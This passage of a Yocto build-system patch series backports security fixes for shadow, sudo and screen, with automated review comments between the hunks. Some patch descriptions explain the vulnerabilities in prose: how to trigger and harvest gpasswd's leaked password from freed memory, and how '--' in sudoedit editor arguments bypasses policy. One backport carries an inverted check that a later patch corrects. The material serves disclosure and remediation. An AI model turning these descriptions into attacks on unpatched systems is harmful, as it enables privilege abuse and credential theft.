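Review bot: `queryflag = -1;` has moved into the `else` branch, so when `CheckPid(m.m.command.apid)` rejects the pid the flag keeps whatever value the code above gave it. The `(queryflag >= 0)` test shows it can be non-negative at this point, and before the patch it was always reset here; how a stale value is used later is not visible in the hunk, so this should be confirmed against the rest of ReceiveMsg. Resetting it after the if/else, i.e. keeping `queryflag = -1;` just before the closing `}` of the case block, preserves the old behaviour on both paths.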
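--- a/meta/recipes-extended/screen/screen_4.8.0.bb
+++ b/meta/recipes-extended/screen/screen_4.8.0.bb
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \
 file://0002-comm.h-now-depends-on-term.h.patch \
 file://0001-fix-for-multijob-build.patch \
 file://0001-Remove-more-compatibility-stuff.patch \
+file://CVE-2021-26937.patch \
+file://CVE-2023-24626.patch \
 "
 
 SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e"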
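--- a/meta/recipes-extended/sed/sed_4.8.bb
+++ b/meta/recipes-extended/sed/sed_4.8.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Stream EDitor (text filtering utility)"
 HOMEPAGE = "http://www.gnu.org/software/sed/"
+DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor."
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \
 file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \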
diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch new file mode 100644 index 0000000000..aea07ff361 --- /dev/null +++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch | |||
@@ -0,0 +1,66 @@ | |||
1 | From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001 | ||
2 | From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com> | ||
3 | Date: Fri, 31 Mar 2023 14:46:50 +0200 | ||
4 | Subject: [PATCH] Overhaul valid_field() | ||
5 | |||
6 | e5905c4b ("Added control character check") introduced checking for | ||
7 | control characters but had the logic inverted, so it rejects all | ||
8 | characters that are not control ones. | ||
9 | |||
10 | Cast the character to `unsigned char` before passing to the character | ||
11 | checking functions to avoid UB. | ||
12 | |||
13 | Use strpbrk(3) for the illegal character test and return early. | ||
14 | |||
15 | Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4] | ||
16 | |||
17 | Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com> | ||
18 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
19 | --- | ||
20 | lib/fields.c | 24 ++++++++++-------------- | ||
21 | 1 file changed, 10 insertions(+), 14 deletions(-) | ||
22 | |||
23 | diff --git a/lib/fields.c b/lib/fields.c | ||
24 | index fb51b582..53929248 100644 | ||
25 | --- a/lib/fields.c | ||
26 | +++ b/lib/fields.c | ||
27 | @@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal) | ||
28 | |||
29 | /* For each character of field, search if it appears in the list | ||
30 | * of illegal characters. */ | ||
31 | + if (illegal && NULL != strpbrk (field, illegal)) { | ||
32 | + return -1; | ||
33 | + } | ||
34 | + | ||
35 | + /* Search if there are non-printable or control characters */ | ||
36 | for (cp = field; '\0' != *cp; cp++) { | ||
37 | - if (strchr (illegal, *cp) != NULL) { | ||
38 | + unsigned char c = *cp; | ||
39 | + if (!isprint (c)) { | ||
40 | + err = 1; | ||
41 | + } | ||
42 | + if (iscntrl (c)) { | ||
43 | err = -1; | ||
44 | break; | ||
45 | } | ||
46 | } | ||
47 | |||
48 | - if (0 == err) { | ||
49 | - /* Search if there are non-printable or control characters */ | ||
50 | - for (cp = field; '\0' != *cp; cp++) { | ||
51 | - if (!isprint (*cp)) { | ||
52 | - err = 1; | ||
53 | - } | ||
54 | - if (!iscntrl (*cp)) { | ||
55 | - err = -1; | ||
56 | - break; | ||
57 | - } | ||
58 | - } | ||
59 | - } | ||
60 | - | ||
61 | return err; | ||
62 | } | ||
63 | |||
64 | -- | ||
65 | 2.34.1 | ||
66 | |||
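Review bot: In the rewritten loop the `iscntrl (c)` test comes after `!isprint (c)`, so for a control character `err` is typically first set to 1 and then overwritten with -1 before the `break`. Testing control characters first and returning at once, `if (iscntrl (c)) { return -1; }` followed by `if (!isprint (c)) { err = 1; }`, would match the early return already used for the `strpbrk` check and make the precedence of the two results explicit. The comment kept above the `strpbrk` call still says "For each character of field", which no longer describes a single library call. valid_field starts outside the hunk.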
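--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
@@ -0,0 +1,54 @@
+From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001
+From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com>
+Date: Thu, 23 Mar 2023 23:39:38 +0000
+Subject: [PATCH] Added control character check
+
+Added control character check, returning -1 (to "err") if control characters are present.
+
+CVE: CVE-2023-29383
+Upstream-Status: Backport
+
+Reference to upstream:
+https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+lib/fields.c | 11 +++++++----
+1 file changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index 640be931..fb51b582 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -21,9 +21,9 @@
+*
+* The supplied field is scanned for non-printable and other illegal
+* characters.
+- * + -1 is returned if an illegal character is present.
+- * + 1 is returned if no illegal characters are present, but the field
+- * contains a non-printable character.
++ * + -1 is returned if an illegal or control character is present.
++ * + 1 is returned if no illegal or control characters are present,
++ * but the field contains a non-printable character.
+* + 0 is returned otherwise.
+*/
+int valid_field (const char *field, const char *illegal)
+@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal)
+}
+
+if (0 == err) {
+- /* Search if there are some non-printable characters */
++ /* Search if there are non-printable or control characters */
+for (cp = field; '\0' != *cp; cp++) {
+if (!isprint (*cp)) {
+err = 1;
++ }
++ if (!iscntrl (*cp)) {
++ err = -1;
+break;
+}
+}
+--
+2.34.1
+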
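Review bot: The added test `if (!iscntrl (*cp))` (patch line 47) is negated, so as written it sets `err = -1` for the first character that is not a control character. The follow-up 0001-Overhaul-valid_field.patch in this same change corrects it, which means this backport is only usable together with that patch and in that order. The header should record the dependency, for example `Note: must be applied together with 0001-Overhaul-valid_field.patch, which fixes the inverted iscntrl() check`.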
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch new file mode 100644 index 0000000000..75dbbad299 --- /dev/null +++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch | |||
@@ -0,0 +1,146 @@ | |||
1 | From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001 | ||
2 | From: Alejandro Colomar <alx@kernel.org> | ||
3 | Date: Sat, 10 Jun 2023 16:20:05 +0200 | ||
4 | Subject: [PATCH] gpasswd(1): Fix password leak | ||
5 | |||
6 | CVE: CVE-2023-4641 | ||
7 | Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904] | ||
8 | |||
9 | How to trigger this password leak? | ||
10 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | ||
11 | |||
12 | When gpasswd(1) asks for the new password, it asks twice (as is usual | ||
13 | for confirming the new password). Each of those 2 password prompts | ||
14 | uses agetpass() to get the password. If the second agetpass() fails, | ||
15 | the first password, which has been copied into the 'static' buffer | ||
16 | 'pass' via STRFCPY(), wasn't being zeroed. | ||
17 | |||
18 | agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and | ||
19 | can fail for any of the following reasons: | ||
20 | |||
21 | - malloc(3) or readpassphrase(3) failure. | ||
22 | |||
23 | These are going to be difficult to trigger. Maybe getting the system | ||
24 | to the limits of memory utilization at that exact point, so that the | ||
25 | next malloc(3) gets ENOMEM, and possibly even the OOM is triggered. | ||
26 | About readpassphrase(3), ENFILE and EINTR seem the only plausible | ||
27 | ones, and EINTR probably requires privilege or being the same user; | ||
28 | but I wouldn't discard ENFILE so easily, if a process starts opening | ||
29 | files. | ||
30 | |||
31 | - The password is longer than PASS_MAX. | ||
32 | |||
33 | The is plausible with physical access. However, at that point, a | ||
34 | keylogger will be a much simpler attack. | ||
35 | |||
36 | And, the attacker must be able to know when the second password is being | ||
37 | introduced, which is not going to be easy. | ||
38 | |||
39 | How to read the password after the leak? | ||
40 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | ||
41 | |||
42 | Provoking the leak yourself at the right point by entering a very long | ||
43 | password is easy, and inspecting the process stack at that point should | ||
44 | be doable. Try to find some consistent patterns. | ||
45 | |||
46 | Then, search for those patterns in free memory, right after the victim | ||
47 | leaks their password. | ||
48 | |||
49 | Once you get the leak, a program should read all the free memory | ||
50 | searching for patterns that gpasswd(1) leaves nearby the leaked | ||
51 | password. | ||
52 | |||
53 | On 6/10/23 03:14, Seth Arnold wrote: | ||
54 | > An attacker process wouldn't be able to use malloc(3) for this task. | ||
55 | > There's a handful of tools available for userspace to allocate memory: | ||
56 | > | ||
57 | > - brk / sbrk | ||
58 | > - mmap MAP_ANONYMOUS | ||
59 | > - mmap /dev/zero | ||
60 | > - mmap some other file | ||
61 | > - shm_open | ||
62 | > - shmget | ||
63 | > | ||
64 | > Most of these return only pages of zeros to a process. Using mmap of an | ||
65 | > existing file, you can get some of the contents of the file demand-loaded | ||
66 | > into the memory space on the first use. | ||
67 | > | ||
68 | > The MAP_UNINITIALIZED flag only works if the kernel was compiled with | ||
69 | > CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare. | ||
70 | > | ||
71 | > malloc(3) doesn't zero memory, to our collective frustration, but all the | ||
72 | > garbage in the allocations is from previous allocations in the current | ||
73 | > process. It isn't leftover from other processes. | ||
74 | > | ||
75 | > The avenues available for reading the memory: | ||
76 | > - /dev/mem and /dev/kmem (requires root, not available with Secure Boot) | ||
77 | > - /proc/pid/mem (requires ptrace privileges, mediated by YAMA) | ||
78 | > - ptrace (requires ptrace privileges, mediated by YAMA) | ||
79 | > - causing memory to be swapped to disk, and then inspecting the swap | ||
80 | > | ||
81 | > These all require a certain amount of privileges. | ||
82 | |||
83 | How to fix it? | ||
84 | ~~~~~~~~~~~~~~ | ||
85 | |||
86 | memzero(), which internally calls explicit_bzero(3), or whatever | ||
87 | alternative the system provides with a slightly different name, will | ||
88 | make sure that the buffer is zeroed in memory, and optimizations are not | ||
89 | allowed to impede this zeroing. | ||
90 | |||
91 | This is not really 100% effective, since compilers may place copies of | ||
92 | the string somewhere hidden in the stack. Those copies won't get zeroed | ||
93 | by explicit_bzero(3). However, that's arguably a compiler bug, since | ||
94 | compilers should make everything possible to avoid optimizing strings | ||
95 | that are later passed to explicit_bzero(3). But we all know that | ||
96 | sometimes it's impossible to have perfect knowledge in the compiler, so | ||
97 | this is plausible. Nevertheless, there's nothing we can do against such | ||
98 | issues, except minimizing the time such passwords are stored in plain | ||
99 | text. | ||
100 | |||
101 | Security concerns | ||
102 | ~~~~~~~~~~~~~~~~~ | ||
103 | |||
104 | We believe this isn't easy to exploit. Nevertheless, and since the fix | ||
105 | is trivial, this fix should probably be applied soon, and backported to | ||
106 | all supported distributions, to prevent someone else having more | ||
107 | imagination than us to find a way. | ||
108 | |||
109 | Affected versions | ||
110 | ~~~~~~~~~~~~~~~~~ | ||
111 | |||
112 | All. Bug introduced in shadow 19990709. That's the second commit in | ||
113 | the git history. | ||
114 | |||
115 | Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)") | ||
116 | Reported-by: Alejandro Colomar <alx@kernel.org> | ||
117 | Cc: Serge Hallyn <serge@hallyn.com> | ||
118 | Cc: Iker Pedrosa <ipedrosa@redhat.com> | ||
119 | Cc: Seth Arnold <seth.arnold@canonical.com> | ||
120 | Cc: Christian Brauner <christian@brauner.io> | ||
121 | Cc: Balint Reczey <rbalint@debian.org> | ||
122 | Cc: Sam James <sam@gentoo.org> | ||
123 | Cc: David Runge <dvzrv@archlinux.org> | ||
124 | Cc: Andreas Jaeger <aj@suse.de> | ||
125 | Cc: <~hallyn/shadow@lists.sr.ht> | ||
126 | Signed-off-by: Alejandro Colomar <alx@kernel.org> | ||
127 | Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com> | ||
128 | --- | ||
129 | src/gpasswd.c | 1 + | ||
130 | 1 file changed, 1 insertion(+) | ||
131 | |||
132 | diff --git a/src/gpasswd.c b/src/gpasswd.c | ||
133 | index 4d75af96..a698b32a 100644 | ||
134 | --- a/src/gpasswd.c | ||
135 | +++ b/src/gpasswd.c | ||
136 | @@ -918,6 +918,7 @@ static void change_passwd (struct group *gr) | ||
137 | strzero (cp); | ||
138 | cp = getpass (_("Re-enter new password: ")); | ||
139 | if (NULL == cp) { | ||
140 | + memzero (pass, sizeof pass); | ||
141 | exit (1); | ||
142 | } | ||
143 | |||
144 | -- | ||
145 | 2.42.0 | ||
146 | |||
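Review bot: The added `memzero (pass, sizeof pass);` before `exit (1)` only helps if memzero in this shadow version cannot be optimised away. The description relies on it calling explicit_bzero(3), which is not shown here and should be confirmed for the tree this recipe builds, since a plain memset() on a buffer that is never read again before exit may be dropped as a dead store. The description also speaks of agetpass() while the hunk calls `getpass`, and the From hash (51731b01…) differs from the one in Upstream-Status (65c88a43…); a header line stating how the backport was adapted would help. change_passwd continues outside the hunk.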
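--- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
+++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass"
 HOMEPAGE = "http://github.com/shadow-maint/shadow"
 BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
 SECTION = "base utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
 LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5"
 
 DEPENDS = "base-passwd"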
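--- a/meta/recipes-extended/shadow/shadow.inc
+++ b/meta/recipes-extended/shadow/shadow.inc
@@ -1,8 +1,9 @@
 SUMMARY = "Tools to change and administer password and group data"
 HOMEPAGE = "http://github.com/shadow-maint/shadow"
+DESCRIPTION = "${SUMMARY}"
 BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
 SECTION = "base/utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
 LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \
 file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af"
 
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}.
 file://shadow-4.1.3-dots-in-usernames.patch \
 ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \
 file://shadow-relaxed-usernames.patch \
+file://CVE-2023-29383.patch \
+file://0001-Overhaul-valid_field.patch \
+file://CVE-2023-4641.patch \
 "
 
 SRC_URI_append_class-target = " \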
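--- a/meta/recipes-extended/shadow/shadow_4.8.1.bb
+++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p
 
 BBCLASSEXTEND = "native nativesdk"
 
+# Severity is low and marked as closed and won't fix.
+# https://bugzilla.redhat.com/show_bug.cgi?id=884658
+CVE_CHECK_WHITELIST += "CVE-2013-4235"
 
+# This is an issue for a different shadow
+CVE_CHECK_WHITELIST += "CVE-2016-15024"
 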
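Review bot: The justification for ignoring CVE-2016-15024, "This is an issue for a different shadow", does not say which product the CVE is filed against or where that was checked, unlike the CVE-2013-4235 entry above it, which links the bug report. A whitelist entry silences the CVE checker for this recipe from then on, so the comment should let a later auditor re-verify the decision, for example `# CVE-2016-15024 is filed against an unrelated project that is also named "shadow" (see <advisory URL>); shadow-maint/shadow is not affected`. For CVE-2013-4235, "closed and won't fix" describes the tracker state, so the issue is presumably still present in the shipped code; the comment could say that explicitly so the whitelist entry is not read as "fixed".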
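--- /dev/null
+++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
@@ -0,0 +1,26 @@
+From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Sat, 23 Oct 2021 20:20:59 +0200
+Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage.
+
+This helps reproducibility.
+
+Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+Makefile | 2 +-
+1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile b/Makefile
+index 886018f9..f4290f9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -412,7 +412,7 @@ git-commit-id.h:
+$(OBJS): stress-ng.h Makefile
+
+stress-ng.1.gz: stress-ng.1
+- gzip -c $< > $@
++ gzip -n -c $< > $@
+
+.PHONY: dist
+dist: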
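--- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \
+SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \
 file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
+file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \
 "
-SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae"
-SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0"
+SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"
+S = "${WORKDIR}/git"
 
 DEPENDS = "coreutils-native"
 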
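Review bot: The new `SRCREV` pins the fetch to a full commit hash, but nothing in the recipe records that this commit is the 0.11.17 release the file name claims, whereas the removed `SRC_URI[sha256sum]` was tied to a versioned tarball name. A one-line comment above `SRCREV`, such as `# SRCREV is the upstream commit for the ${PV} release tag`, would let a reviewer check the hash against the upstream tag at the next version bump. The HOMEPAGE shown in the hunk header still points at kernel.ubuntu.com while the source now comes from GitHub; that line is outside the hunk, so this may be deliberate.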
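--- /dev/null
+++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
@@ -0,0 +1,113 @@
+Backport of:
+
+# HG changeset patch
+# Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a
+sudoedit: do not permit editor arguments to include "--"
+We use "--" to separate the editor and arguments from the files to edit.
+If the editor arguments include "--", sudo can be tricked into allowing
+the user to edit a file not permitted by the security policy.
+Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com) for finding this bug.
+
+CVE: CVE-2023-22809
+Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]
+Signed-off-by: Omkar Patil <omkar.patil@kpit.com>
+
+--- a/plugins/sudoers/editor.c
++++ b/plugins/sudoers/editor.c
+@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed
+const char *cp, *ep, *tmp;
+const char *edend = ed + edlen;
+struct stat user_editor_sb;
+- int nargc;
++ int nargc = 0;
+debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL)
+
+/*
+@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed
+free(editor_path);
+while (nargc--)
+free(nargv[nargc]);
++ free(nargv);
++ debug_return_str(NULL);
++ }
++
++ /*
++ * We use "--" to separate the editor and arguments from the files
++ * to edit. The editor arguments themselves may not contain "--".
++ */
++ if (strcmp(nargv[nargc], "--") == 0) {
++ sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
++ sudo_warnx("%s", U_("editor arguments may not contain \"--\""));
++ errno = EINVAL;
++ free(editor_path);
++ while (nargc--)
++ free(nargv[nargc]);
+free(nargv);
+debug_return_str(NULL);
+}
+--- a/plugins/sudoers/sudoers.c
++++ b/plugins/sudoers/sudoers.c
+@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con
+
+/* Note: must call audit before uid change. */
+if (ISSET(sudo_mode, MODE_EDIT)) {
++ const char *env_editor = NULL;
+int edit_argc;
+- const char *env_editor;
+
+free(safe_cmnd);
+safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc,
+&edit_argv, NULL, &env_editor, false);
+if (safe_cmnd == NULL) {
+- if (errno != ENOENT)
++ switch (errno) {
++ case ENOENT:
++ audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ sudo_warnx(U_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ goto bad;
++ case EINVAL:
++ if (def_env_editor && env_editor != NULL) {
++ /* User tried to do something funny with the editor. */
++ log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL,
++ "invalid user-specified editor: %s", env_editor);
++ goto bad;
++ }
++ /* FALLTHROUGH */
++ default:
+goto done;
+- audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- sudo_warnx(U_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- goto bad;
++ }
+}
+if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors)
+goto done;
+--- a/plugins/sudoers/visudo.c
++++ b/plugins/sudoers/visudo.c
+@@ -308,7 +308,7 @@ static char *
+get_editor(int *editor_argc, char ***editor_argv)
+{
+char *editor_path = NULL, **whitelist = NULL;
+- const char *env_editor;
++ const char *env_editor = NULL;
+static char *files[] = { "+1", "sudoers" };
+unsigned int whitelist_len = 0;
+debug_decl(get_editor, SUDOERS_DEBUG_UTIL)
+@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi
+if (editor_path == NULL) {
+if (def_env_editor && env_editor != NULL) {
+/* We are honoring $EDITOR so this is a fatal error. */
+- sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor);
++ if (errno == ENOENT) {
++ sudo_warnx(U_("specified editor (%s) doesn't exist"),
++ env_editor);
++ }
++ exit(EXIT_FAILURE);
+}
+sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor);
+}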
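Review bot: The status trailer in the patch header is misspelled as `Upstream-Staus:`, so tooling and reviewers that search patch headers for `Upstream-Status:` will see this CVE backport as having no recorded provenance; the line should read `Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]`. The reference is a distribution tarball fetched over plain http rather than the upstream changeset itself, which makes it harder to confirm the backport matches upstream; citing the upstream commit alongside it would help. In the visudo.c hunk the non-ENOENT path now calls `exit(EXIT_FAILURE)` with no message of its own and appears to rely on the warnings that resolve_editor() prints for the "--" case. A one-line comment there saying so would stop a later reader from adding a duplicate message or removing the exit.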
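--- a/meta/recipes-extended/sudo/sudo.inc
+++ b/meta/recipes-extended/sudo/sudo.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain
 HOMEPAGE = "http://www.sudo.ws"
 BUGTRACKER = "http://www.sudo.ws/bugs/"
 SECTION = "admin"
-LICENSE = "ISC & BSD & Zlib"
+LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib"
 LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \
 file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \
 file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \
@@ -49,3 +49,5 @@ do_compile_prepend () {
 do_install_prepend (){
 mkdir -p ${D}/${localstatedir}/lib
 }
+
+CVE_VERSION_SUFFIX = "patch"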
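Review bot: `CVE_VERSION_SUFFIX = "patch"` is added at the end of the file with no comment, although it changes how the CVE checker compares this recipe's version against affected ranges, so a reader cannot tell why it is needed. A short comment above it, for example `# sudo releases carry a "pN" patch-level suffix; have cve-check compare it as a patch level`, would document the intent. It is also worth confirming that the CVE report for sudo is unchanged or more accurate with this setting, since a wrong suffix mode can hide applicable CVEs.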
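--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
@@ -0,0 +1,59 @@
+From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 15 Nov 2022 09:17:18 +0530
+Subject: [PATCH] CVE-2022-43995
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050]
+CVE: CVE-2022-43995
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Potential heap overflow for passwords < 8
+characters. Starting with sudo 1.8.0 the plaintext password buffer is
+dynamically sized so it is not safe to assume that it is at least 9 bytes in
+size.
+Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz.
+---
+plugins/sudoers/auth/passwd.c | 11 +++++------
+1 file changed, 5 insertions(+), 6 deletions(-)
+
+diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c
+index 03c7a16..76a7824 100644
+--- a/plugins/sudoers/auth/passwd.c
++++ b/plugins/sudoers/auth/passwd.c
+@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth)
+int
+sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback)
+{
+- char sav, *epass;
++ char des_pass[9], *epass;
+char *pw_epasswd = auth->data;
+size_t pw_len;
+int matched = 0;
+@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+
+/*
+* Truncate to 8 chars if standard DES since not all crypt()'s do this.
+- * If this turns out not to be safe we will have to use OS #ifdef's (sigh).
+*/
+- sav = pass[8];
+pw_len = strlen(pw_epasswd);
+- if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len))
+- pass[8] = '\0';
++ if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) {
++ strlcpy(des_pass, pass, sizeof(des_pass));
++ pass = des_pass;
++ }
+
+/*
+* Normal UN*X password check.
+@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+* only compare the first DESLEN characters in that case.
+*/
+epass = (char *) crypt(pass, pw_epasswd);
+- pass[8] = sav;
+if (epass != NULL) {
+if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN)
+matched = !strncmp(pw_epasswd, epass, DESLEN);
+--
+2.25.1
+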
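Review bot: The new `des_pass[9]` buffer in sudo_passwd_verify() receives a copy of up to eight plaintext password characters and, in the lines visible here, is never cleared, so the truncated password stays on the stack after the function returns. Clearing it once crypt() has been called, e.g. `explicit_bzero(des_pass, sizeof(des_pass));` or whichever zeroing helper this sudo version already uses for password buffers, would keep the fix from adding a second lingering plaintext copy. The function's return path is outside the hunk, so this should be checked against the full file and the referenced upstream commit. Separately, the patch Subject is only `CVE-2022-43995`; the description's "Potential heap overflow for passwords < 8 characters" would make a more useful subject line.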
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch new file mode 100644 index 0000000000..bc6f8c19a6 --- /dev/null +++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch | |||
@@ -0,0 +1,646 @@ | |||
1 | Origin: Backport obtained from SUSE. Thanks! | ||
2 | |||
3 | From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001 | ||
4 | From: "Todd C. Miller" <Todd.Miller@sudo.ws> | ||
5 | Date: Wed, 18 Jan 2023 08:21:34 -0700 | ||
6 | Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l" | ||
7 | output. The log message contains user-controlled strings that could include | ||
8 | things like terminal control characters. Space characters in the command | ||
9 | path are now also escaped. | ||
10 | |||
11 | Command line arguments that contain spaces are surrounded with | ||
12 | single quotes and any literal single quote or backslash characters | ||
13 | are escaped with a backslash. This makes it possible to distinguish | ||
14 | multiple command line arguments from a single argument that contains | ||
15 | spaces. | ||
16 | |||
17 | Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv | ||
18 | (https://synacktiv.com). | ||
19 | |||
20 | Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security | ||
21 | Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca] | ||
22 | CVE: CVE-2023-28486 CVE-2023-28487 | ||
